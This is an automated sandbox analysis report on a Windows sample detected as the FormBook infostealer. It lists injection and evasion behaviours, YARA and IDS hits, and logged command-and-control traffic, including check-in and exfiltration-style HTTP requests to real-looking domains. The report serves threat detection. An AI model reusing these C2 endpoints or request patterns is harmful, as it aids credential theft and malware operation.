Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SDBARVe3d3.exe

Overview

General Information

Sample name:SDBARVe3d3.exe
renamed because original name is a hash value
Original sample name:15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103.exe
Analysis ID:1551048
MD5:b6e0fb667376ccebddaf47c6d4432472
SHA1:f596c7e6c1bf8af55b744ef512fdbaa44c75b876
SHA256:15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SDBARVe3d3.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\SDBARVe3d3.exe" MD5: B6E0FB667376CCEBDDAF47C6D4432472)
    • SDBARVe3d3.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\SDBARVe3d3.exe" MD5: B6E0FB667376CCEBDDAF47C6D4432472)
      • wPGxKDFwovcH.exe (PID: 5084 cmdline: "C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 8100 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • wPGxKDFwovcH.exe (PID: 4480 cmdline: "C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2916 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.SDBARVe3d3.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.SDBARVe3d3.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T12:52:20.161258+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449735TCP
                2024-11-07T12:52:59.013477+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449741TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T12:52:59.455958+010020507451Malware Command and Control Activity Detected192.168.2.44974285.159.66.9380TCP
                2024-11-07T12:53:23.159013+010020507451Malware Command and Control Activity Detected192.168.2.44985691.184.0.20080TCP
                2024-11-07T12:53:36.833853+010020507451Malware Command and Control Activity Detected192.168.2.449933194.9.94.8580TCP
                2024-11-07T12:53:50.577710+010020507451Malware Command and Control Activity Detected192.168.2.450010170.39.213.4380TCP
                2024-11-07T12:54:04.125673+010020507451Malware Command and Control Activity Detected192.168.2.45002313.248.169.4880TCP
                2024-11-07T12:54:18.690356+010020507451Malware Command and Control Activity Detected192.168.2.45002738.47.232.19480TCP
                2024-11-07T12:54:32.265623+010020507451Malware Command and Control Activity Detected192.168.2.450031167.172.133.3280TCP
                2024-11-07T12:54:45.843997+010020507451Malware Command and Control Activity Detected192.168.2.450035162.0.211.14380TCP
                2024-11-07T12:55:07.834225+010020507451Malware Command and Control Activity Detected192.168.2.450039162.241.85.9480TCP
                2024-11-07T12:55:21.250769+010020507451Malware Command and Control Activity Detected192.168.2.4500433.33.130.19080TCP
                2024-11-07T12:55:34.666154+010020507451Malware Command and Control Activity Detected192.168.2.4500473.33.130.19080TCP
                2024-11-07T12:55:48.345102+010020507451Malware Command and Control Activity Detected192.168.2.450051188.114.97.380TCP
                2024-11-07T12:56:01.747068+010020507451Malware Command and Control Activity Detected192.168.2.4500553.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SDBARVe3d3.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: SDBARVe3d3.exeReversingLabs: Detection: 65%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SDBARVe3d3.exeJoe Sandbox ML: detected
                Source: SDBARVe3d3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SDBARVe3d3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: fc.pdb source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wPGxKDFwovcH.exe, 00000006.00000000.1972969938.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4133718040.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: SPJ.pdbSHA2568 source: SDBARVe3d3.exe
                Source: Binary string: wntdll.pdbUGP source: SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SDBARVe3d3.exe, SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SPJ.pdb source: SDBARVe3d3.exe
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1C500 FindFirstFileW,FindNextFileW,FindClose,7_2_02A1C500
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax7_2_02A09D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h7_2_030904DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49856 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49933 -> 194.9.94.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 170.39.213.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 167.172.133.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 3.33.130.190:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tesetturhanzade.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 91.184.0.200 91.184.0.200
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
                Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
                Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49735
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ur0f/?NBfdCRyH=zogJdywBU1O1LleSauKJSsuFV/4Ok9lE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiLOby4W89Tfql961FjyGPsIlp+mbksH+4eXA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.tesetturhanzade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ggvc/?NBfdCRyH=8JknlPcTs2UijknQ0bOQpmN1M0hHcLDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1pP+ZXcAQJvFFEy7R+vzIZC0KJff7IqPUUhg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kantinestoel.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /57zf/?NBfdCRyH=RSXDvmZ18TUSGah6EulyS1XswkRToS9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi/NXFftLLf3QUCIw7GC9Ov73YwEGOSCVy7Hg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.deeplungatlas.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yqk5yDx2ID7OvEmOK8YK5XOUf59ObJyvEfgA=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ultrawin23.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ew98/?NBfdCRyH=DRp8qVXu3DttXwS8YKhwd1fMqknFSvhogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpjUHvWcUntSXj4XGnqR7Id1KBxF+AplNn3Lg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sonoscan.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /45n6/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=djThxhCXsVTaW29XXtOrXv7xIwJyr9fT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYygTJ2xilMgHX7dTLMRFf+/COIbLTgBfvWu/E= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.zz67x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jlqg/?NBfdCRyH=8ZwuH3XLrsgkZOwzbHv8kzwaBJUvbtMyt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1siN23r0fyWsL1d4E8Hi4h+DwdtH5CMx58j2c=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.omnibizlux.bizConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /4xim/?NBfdCRyH=0a8PLTuVJQjPSrlNTcujtDihNMeO9FYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP27bmOOo50KzsRrW97hoYkm0aU0/aEWOIRhrI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.vibixx.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.papampalli.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /63jz/?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.vincemachi.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /k8p1/?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.smileyface.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /42jb/?NBfdCRyH=xOvRPSdGlVcg4ggtvlNaQF7r/q5ZE7OS64NTuszpJDlgcn3f2GAJOICwQ4poJfJ85RMy/fsotNCJs0/3zrWyWPthfBhIBxngO9nzBLvphHFnKcLlmUkHPG0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.dodsrprolev.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /l7yl/?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.optimallogics.servicesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.tangible.online
                Source: global trafficDNS traffic detected: DNS query: www.tesetturhanzade.xyz
                Source: global trafficDNS traffic detected: DNS query: www.kantinestoel.online
                Source: global trafficDNS traffic detected: DNS query: www.deeplungatlas.org
                Source: global trafficDNS traffic detected: DNS query: www.ultrawin23.shop
                Source: global trafficDNS traffic detected: DNS query: www.sonoscan.org
                Source: global trafficDNS traffic detected: DNS query: www.zz67x.top
                Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global trafficDNS traffic detected: DNS query: www.vibixx.site
                Source: global trafficDNS traffic detected: DNS query: www.rka6460.online
                Source: global trafficDNS traffic detected: DNS query: www.papampalli.shop
                Source: global trafficDNS traffic detected: DNS query: www.vincemachi.net
                Source: global trafficDNS traffic detected: DNS query: www.smileyface.world
                Source: global trafficDNS traffic detected: DNS query: www.dodsrprolev.shop
                Source: global trafficDNS traffic detected: DNS query: www.optimallogics.services
                Source: global trafficDNS traffic detected: DNS query: www.gokulmohan.online
                Source: unknownHTTP traffic detected: POST /ggvc/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.kantinestoel.onlineOrigin: http://www.kantinestoel.onlineCache-Control: no-cacheConnection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedReferer: http://www.kantinestoel.online/ggvc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like GeckoData Raw: 4e 42 66 64 43 52 79 48 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 70 41 43 65 6d 55 75 52 62 6d 7a 46 62 31 49 4f 68 4c 41 75 68 49 59 42 31 79 41 4c 32 78 67 58 77 3d 3d Data Ascii: NBfdCRyH=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq0pACemUuRbmzFb1IOhLAuhIYB1yAL2xgXw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 07 Nov 2024 11:52:59 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-07T11:53:04.2662658Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:15 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:17 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:20 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
